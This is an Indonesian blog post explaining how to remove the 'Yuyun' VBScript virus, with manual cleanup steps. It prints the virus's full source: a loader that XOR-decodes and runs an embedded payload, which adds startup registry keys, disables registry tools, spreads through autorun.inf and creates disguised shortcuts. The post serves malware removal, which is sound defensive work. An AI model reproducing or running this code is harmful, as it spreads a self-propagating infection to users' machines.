| Mobile| RSS| ONLINE:

1.03.2010

Menghapus Virus Yuyun

Virus ini seperti virus vbscript yang lain,menggunakan compiler bawaan windows yaitu wscript.exe.Virus ini menurut saya cukup ngawur,karena si virus membuat shortcut yang hampir semua nama folder menjadi shortcut.


Selengkapnya virus ini melakukan:



  1. menjalankan script virus dengan autorun.inf , yang kemudian akan menjalankannya secara otomatis waktu windows start up,dengan menulis string run di registry windows.

  2. meng-copy autorun.inf dan script vbs thumb.db yang isinya


‘www.muslimah.or.id;==================================== my name:Yuyun 1.0


‘ ============================



On Error Resume Next


Dim fso, ws


Set fso = CreateObject(“scripting.filesystemobject”)


Set ws = CreateObject(“wscript.Shell”)


Set sh = CreateObject(“Shell.application”)


Q=WScript.ScriptFullName


tmp=fso.GetSpecialFolder(2)


tn=fso.GetTempName


tmpt=tmp+”\”+tn



Set swt=WScript.Arguments


If swt.Count>0 Then


status=swt(0)


If status=”auto” Then


sh.Explore Left(WScript.ScriptFullName,3)


Else


status=Left(WScript.ScriptFullName,Len(WScript.ScriptFullName)-Len(WScript.ScriptName))+status


If fso.FolderExists(status) Then



sh.Explore status


Else


fso.CreateFolder status


sh.Explore status


End If


End If


Else


End If


Set QQ=fso.GetFile(Q)



Set Q1=QQ.OpenAsTextStream(1,0)


isiQ=Q1.Read(QQ.Size)


Q1.close


t1=InStr(1,isiQ,”Yuyun^_^~!~2008″+” >>>”,0)+18


isiQ=Right(isiQ,Len(isiQ)-t1)


hsl=”"


For v=1 To Len(isiQ)


t=Asc(Mid(isiQ,v,1))



hsl=hsl+Chr(t Xor 7)


Next


If fso.FileExists(tmpt) Then fso.GetFile(tmpt).Attributes=0


Set temporary=fso.OpenTextFile(tmpt,2,True,0)


temporary.Write hsl


temporary.Close


ws.Run “WScript.exe //e:VBScript “+tmpt+” “”"+Q+”"”"


‘ Yuyun^_^~!~2008 >>> :::::::::::::::::::::::::::::::::::::::::::::::::::::::



‘J~’ifjb’='^r~ri’Qbu’6)7


‘N’mrts’pfiif’tbb’bqbu~’`nuk’khhlt’indb+’ebssbu+’lnict’btwbdnfkk~’f'jhtkbj’`nuk


‘e~=’Fihi~jhrtb’ni’Mfsnj+’Ihqbjebu’577?


‘Pobi’N'ahric’ihsoni`’ebfrs~’bktb)))’fic’sobi’N'puhsb’sont’tdunws’ahu’fkk


:::::::::::::::::::::::::::::::::::::::::::::::::::::::


Hi’Buuhu’Ubtrjb’Ibs


Cnj’ath+’pt+’tsfsrt+tsfsrt6+’ak~


Tbs’ath’:'DubfsbHembds/%tdunwsni`)ankbt~tsbjhembds%.


Tbs’pt’:'DubfsbHembds/%ptdunws)Tobkk%.



Tbs’to’:'DubfsbHembds/%Tobkk)fwwkndfsnhi%.


Tbs’ibs’:'DubfsbHembds/%ptdunws)ibsphul%.


ak~:afktb


sjw:ath)@bsTwbdnfkAhkcbu/5.


si:ath)@bsSbjwIfjb


sjws:sjw,%[%,si


chd:pt)TwbdnfkAhkcbut/%J~Chdrjbist%.


Tbs'tps:PTdunws)Fu`rjbist


Na'tps)Dhris97'Sobi



tsfsrt:tps/7.


Bic'Na


na'ath)ankbbntst/sjw,%[^r~ri)V%.'sobi


tbs'nuf:ath)`bsankb/sjw,%[^r~ri)V%.


nuf)fssunersbt:7


nuf)ifjb:%tofknofo)nuf%


na'nuf)ifjb:%tofknofo)nuf%'sobi


nuf)ifjb:%^r~ri)V%


tbs'nuf:ath)hwbisbsankb/sjw,%[^r~ri)V%+5+surb.



bktb


ak~:surb


bic'na


bktb


tbs'nuf:ath)hwbisbsankb/sjw,%[^r~ri)V%+5+surb.


bic'na


Tbs'FV:ath)@bsAnkb/tsfsrt.


Na'ath)AnkbBntst/sjws.'Sobi'ath)@bsAnkb/sjws.)Fssunersbt:7


FV)Dhw~'sjws+Surb



Tbs'FV:ath)@bsAnkb/sjws.


FV)Fssunersbt:4>


fiq:sjw,%[frsh)bb%


Na'Ihs'ath)AnkbBntst/fiq.'Sobi'FV)Dhw~'fiq


Tbs'frsh:ath)@bsAnkb/fiq.'


frsh)fssunersbt:7


Tbs'frs:ath)HwbiSbsAnkb/fiq+5+Surb+7.


ntn:%\frshuriZ9hwbi:PTdunws)bb'((b=QETdunws'sorje)ce'frsh9tobkk[hwbi:Hwbi9tobkk[hwbi[Dhjjfic:PTdunws)bb'((b=QETdunws'sorje)ce'frsh9tobkk[hwbi[Cbafrks:69tobkk[bwkhub:Bwkhub9tobkk[bwkhub[Dhjjfic:PTdunws)bb'((b=QETdunws'sorje)ce'frsh%


ntn:Ubwkfdb/ntn+%9%+qeDuKa.



frs)Punsb'ntn


frs)Dkhtb


frsh)Fssunersbt:4>


ksld:to)Ifjbtwfdb/!O6d!.)Tbka)wfso','%[Jnduhthas[DC'Eruini`%


FV)Dhw~'ksld,%[sorje)ce%+Surb


frsh)Dhw~'ksld,%[frshuri)nia%+Surb


Na'ath)AnkbBntst/chd,%[cfsfeftb)jce%.'Sobi'ath)@bsAnkb/chd,%[cfsfeftb)jce%.)Fssunersbt:7


FV)Dhw~'chd,%[cfsfeftb)jce%+Surb


ub`V



Tbs'ufuf:RINTLF


Obus}'Afktb


Na'Cf~/Ihp.;94'Sobi'ublrutna'chd+6'Bktb'ublrutna'chd+4


dfkk'fssfdlXibs


Obus}'Surb


Tre'ublrutna/wfso+cw.


Hi'Buuhu'Ubtrjb'Ibs


cuhwa'wfso


ptdunws)tkbbw'27



Na'cw97'Sobi


Ahu'Bfdo'akcu6'Ni'ath)@bsAhkcbu/wfso,%[%.)TreAhkcbut


ublrutna'akcu6)Wfso+'cw*6


Ibs


Bic'Na


Bic'Tre


Tre'cuhwa/wfso.


Hi'Buuhu'Ubtrjb'Ibs


na'cf~/ihp.:6'fic'/jhiso/ihp.jhc'4.:6'sobi'



ufuf)dhw~'wfso,%[Efdf'FV)usa%


ufuf)dhw~'wfso,%[J~'ifjb'nt'^r~ri)usa%


bic'na


`6:wfso,%[frshuri)nia%


`5:wfso,%[Sorje)ce%


Na'ath)AnkbBntst/`6.'Sobi'


Tbs'`66:ath)@bsAnkb/`6.'


Na'`66)Fssunersbt;94>'Sobi'



`66)Fssunersbt:7


frsh)Dhw~'wfso,%[frshuri)nia%+Surb


bic'na


bktb'


frsh)Dhw~'wfso,%[frshuri)nia%+Surb


bic'na


Na'ath)AnkbBntst/`5.'Sobi'


Tbs'`65:ath)@bsAnkb/`5.


Na'`65)Fssunersbt;94>'Sobi



`65)Fssunersbt:7


FV)Dhw~'wfso,%[Sorje)ce%+Surb


bic'na


bktb


FV)Dhw~'wfso,%[Sorje)ce%+Surb


Bic'Na


Na'Ihs'ath)AnkbBntst/wfso,%[Jnduhthas)kil%.'Sobi


tohu]qinsf’wfso,%[Jnduhthas%+%Jnduhthas%


cuhw:Fuuf~/%Ibp'Ofuu~'Whssbu'fic)))%+%Ibp'Ahkcbu%+%TrufsV%+%Ufoftnf%+%@fjb%+%]qinsf%+%Chpikhfc%+%CfsfV%+%CfsfV%.



pp:6


Ahu’Bfdo’c'Ni’cuhw


Na’Cf~/ihp.’Jhc’4′:’pp’Sobi’tohu]qinsf’wfso,%[%,c+c


ptdunws)tkbbw'17


pp:pp,6


Ibs


u:7


Ahu'Bfdo'akcu'Ni'ath)@bsAhkcbu/wfso,%[%.)TreAhkcbut


tohu]qinsf’wfso,%[%,akcu)ifjb+akcu)Ifjb



ptdunws)tkbbw'17


Na'u94'Sobi'


Bns'Ahu


Bic'na


u:u,6


Ibs


Bic'Na


Bic'Tre


Tre'tohu]qinsf/wfso+su`s.



Tbs’tohu:pt)DubfsbTohusdrs/wfso,%)kil%.


tohu)ndhikhdfsnhi:%tobkk45)ckk+4%


tohu)sfu`bswfso:%ptdunws)bb%


tohu)fu`rjbist:%((b=QETdunws’sorje)ce’%%%,su`s,%%%%


tohu)tfqb


Bic’Tre


aridsnhi’fssfdlXibs/.


Hi’Buuhu’Ubtrjb’Ibs


buu)dkbfu



Tbs’hemAhkcbu’:'to)Ifjbtwfdb/!O64!.


Tbs’dhkNsbjt’:'hemAhkcbu)Nsbjt


Ahu’Bfdo’tsuAnkbIfjb’ni’hemAhkcbu)Nsbjt


s:’hemAhkcbu)@bsCbsfnktHa/tsuAnkbIfjb+’63.


na’ath)ahkcbubntst/s.’sobi


ublrutna’s+3


bic’na


Ibs


Bic’aridsnhi



Tre’scu/.


Hi’Buuhu’Ubtrjb’Ibs


buu)dkbfu


PTdunws)Tkbbw’6?7777


na’buu)irjebu97’sobi’ptdunws)vrns


Bic’Tre


aridsnhi’RINTLF/.


Hi’buuhu’ubtrjb’ibs


:qeduka



fcq:%^r~ri’Qbu’6)7′YXY&::::::::::::::::::99Erlfi’cfun’srkfi`’reri’nf’cndnwsf9lfuif’ebuefof~f’jbjenfulfii~f’cfkfj’tfimri`’cfi’wrmf9sfl’mr`f’cfun’srkfi`’lfln9lfuif’intsf’jbjerfsi~f’cnnimfl’cfi’cnwbuercfl9sfwn’cfun’srkfi`’urtrl’ef`nfi’lnun9cblfs’lb’ofsn’risrl’cntf~fi`n9cblfs’lb’sfi`fi’risrl’cnknicri`n99/cnlrsnw’cu=’F`fu’Encfcfun’Dbjerur’Wfcfjr.999%%Mfi`fikfo’lfjr’ebutnlfw’kbjfo+’cfi’mfi`fikfo’/wrkf.’lfjr’ebutbcno’ofsn+’wfcfofk’lfjrkfo9hufi`*hufi`’~fi`’wfkni`’sni“n’/cbufmfsi~f.+’mnlf’lfjr’hufi`*hufi`’~fi`’ebunjfi)%%9/VT)’Fkn’Njufi=64>.999Lfsflfikfo’lbwfcf’hufi`’kfln*kfln’~fi`’ebunjfi=’%%Obicflkfo’jbublf’jbifofi’wficfi`fi~f+’9cfi’jbjbknofuf’lbjfkrfii~f<’~fi`’cbjnlnfi’nsr’fcfkfo’kbeno’trdn’ef`n’jbublf+’9tbtri“roi~f’Fkkfo’Jfof’Jbi`bsforn’fwf’~fi`’jbublf’wbuerfs)%%’/VT)’Fi’Iru=47.99Lfsflfikfo’lbwfcf’pfinsf’~fi`’ebunjfi=’%%Obicflkfo’jbublf’jbifofi’wficfi`fii~f+’9cfi’lbjfkrfii~f+’cfi’mfi`fikfo’jbublf’jbifjwfllfi’wbuonftfii~f+’lbdrfkn’~fi`’9/enftf.’ifjwfl’cfun’wfcfi~f)’Cfi’obicflkfo’jbublf’jbirsrwlfi’lfni’lrcri`’9lbcfcfi~f))))%%’/VT)’Fi’Iru=47.99Thuu~’N'mrts’Insnw’Wunis’sohl))))Icfl’wf5′lofiYXY&”ppp)jrtknjfo)hu)nc’99Ofn’fifl’Fcfj+’tbtri“roi~f’Lfjn’sbkfo’jbirurilfi’lbwfcfjr’9wflfnfi’risrl’jbirsrw’frufsjr’cfi’wflfnfi’nicfo’risrl’wbuonftfi)9Cfi’wflfnfi’sflpf’nsrkfo’~fi`’wfkni`’efnl)’^fi`’cbjnlnfi’nsr’fcfkfo’9tbefof`nfi’cfun’sficf*sficf’lblrftffi’Fkkfo+’jrcfo*jrcfofi’jbublf’tbkfkr’ni`fs)/Fk*F ufa=51.%


fcq:ubwkfdb/fcq+%9%+.


tbs’^r5i:ath)hwbisbsankb/sjw,%[q)chd%+5+surb.


^r5i)punsb’fcq


^r5i)dkhtb


na’cf~/ihp.:6′fic’/jhiso/ihp.jhc’4.:6’sobi’


na’ak~:afktb’sobi



ahu’n:6’sh’4


pt)uri’%ihsbwfc)bb’(w’%%%,sjw,%[q)chd%%%


ibs


bic’na


bic’na


tbs’RINTLF:ath)`bsankb/sjw,%[q)chd%.


bic’aridsnhi


Tre’ub`V/.


Hi’Buuhu’Ubtrjb’Ibs



na’cf~/ihp.:6’sobi


pt)Ub`Punsb’%OLDU[DKTNC[|66666666*5555*4444*3333*222222222222z[%+’%^r~riXDfisn%


pt)Ub`Punsb’%OLDU[DKTNC[|66666666*5555*4444*3333*222222222222z[CbafrksNdhi[%+%tobkk45)ckk+3?%


pt)Ub`Punsb’%OLDU[DKTNC[|66666666*5555*4444*3333*222222222222z[TobkkAhkcbu[Fssunersbt%+7+%UB@XCPHUC%


pt)ub`punsb’%OLKJ[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[bwkhubu[Cbtlshw[IfjbTwfdb[|66666666*5555*4444*3333*222222222222z[%+%%


bic’na


pt)ub`cbkbsb’%OLDU[kilankb[NtTohusdrs%


pt)Ub`Punsb’%OLDR[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Uri[Bwkhubu%+%Ptdunws)bb’((b=QETdunws’%%%,chd,%[cfsfeftb)jce%%%


pt)Ub`Punsb’%OLDR[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Whkndnbt[T~tsbj[CntfekbUb`ntsu~shhkt%+6+%UB@XCPHUC%



na’kdftb/ath)`bscunqb/%d=%.)AnkbT~tsbj.:%isat%’sobi


nufV:FV)hwbiftsbstsubfj/6+7.)ubfc/FV)tn}b.


ppp:ath)@bsTwbdnfkAhkcbu/7.


tbs’mml:ath)hwbisbsankb/ppp,%[=Jnduhthas’Haandb’Rwcfsb’ahu’Pnichpt’_W)t~t%+5+surb.


mml)punsb’nufV


mml)dkhtb


pt)Ub`Punsb’%OLKJ[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Uri[PniRwcfsb%+%Ptdunws)bb’((b=QETdunws’%%%,ppp,%[=Jnduhthas’Haandb’Rwcfsb’ahu’Pnichpt’_W)t~t%%%


bic’na


Bic’Tre



Tre’Obus}/hhh.


Hi’Buuhu’Ubtrjb’Ibs


ch


Ahu’Bfdo’cuq’Ni’ath)Cunqbt


Na’cuq)CunqbS~wb:6′Sobi


ublrutna’cuq)Wfso+3


Bktb


ublrutna’cuq)Wfso+5


Bic’na



Ibs


na’ak~:afktb’sobi’


scu


bktb’


ptdunws)vrns


bic’na


ub`V


Na’hhh:Afktb’Sobi’


Bns’Ch



Bic’Na


khhw


Bic’Tre


hampir kesemua nama folder yang ada dengan tujuan eksekusi langsung dari wscript.exe



  1. Membuat shortcut dengan nama folder yang ada, ditambah nama microsoft dan new harry potter and… dan new folder yang kesemuanya menuju ke wscript.exe untuk eksekusi file script thumb.db yang sebenarnya script vbs (visual basic script ) yang tersebar di folder-folder.

  2. Membuat system folder di desktop dengan nama yuyun_cantix yang bila diclick kanan hanya ada pilihan buat shortcut,dan tidak ada pilihan hapus.


Cara membersihkannya:


1.Matikan fungsi Wscript.exe,caranya menggunakan gpedit.msc>administrative templates>System>Double click Don’t run specified Windows applications>enabled>show>tambahkan Wscript.exe dan cscript.exe>ok.Dengan cara ini semua virus vbscript tidak akan tereksekusi.



2.Gunakan antivirus pcmav bisa download di sini atau anti virus lainnya seperti smadav yang telah mendeteksi virus ini sekalian delete shortcutnya bisa down load disini .Sebelumnya endtask wscript.exe yang berjalan di processes task manager.Atau bisa pakai ansav..


Atau silakan Download di-link yang saya sediakan yaitu di Download Anti Virus dan Update anti Virus yang selalu saya update  :)


3.Gunakan search windows , untuk mencari shortcut yang dibuat oleh virus.Cirinya bila shortcut diproperties ditarget akan tertulis “WScript.exe //e:VBScript “+tmpt+” “”"+Q+”.Tapi smadav dan ansav sudah bisa deteksi,scan aja terus hapus..  :)


4.Gunakan regedit.exe (ketik di menu run) click di my computer-regedit,Click edit>find>ketik yuyun_cantix>click find next.Cara ini digunakan untuk menghilangkan folder system (yuyun_cantix) yang dibuat di desktop.Setelah ketemu lalu delete key sebelah kiri (seperti folder)tenpat yuyun_cantix berada.Dengan begitu folder system yang ada didesktop bisa di delete.



5.Gunakan msconfig atau tools lain seperti hijack this untuk menghilangkan start up virus.


Semoga artikel saya berguna… untuk yang mau bertanya,atau memberi informasi..dan saran  silakan komentar… :)   saya akan siap membantu sebisa mungkin…..

Posted by daunbaru at 12:51 AM
Labels:

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)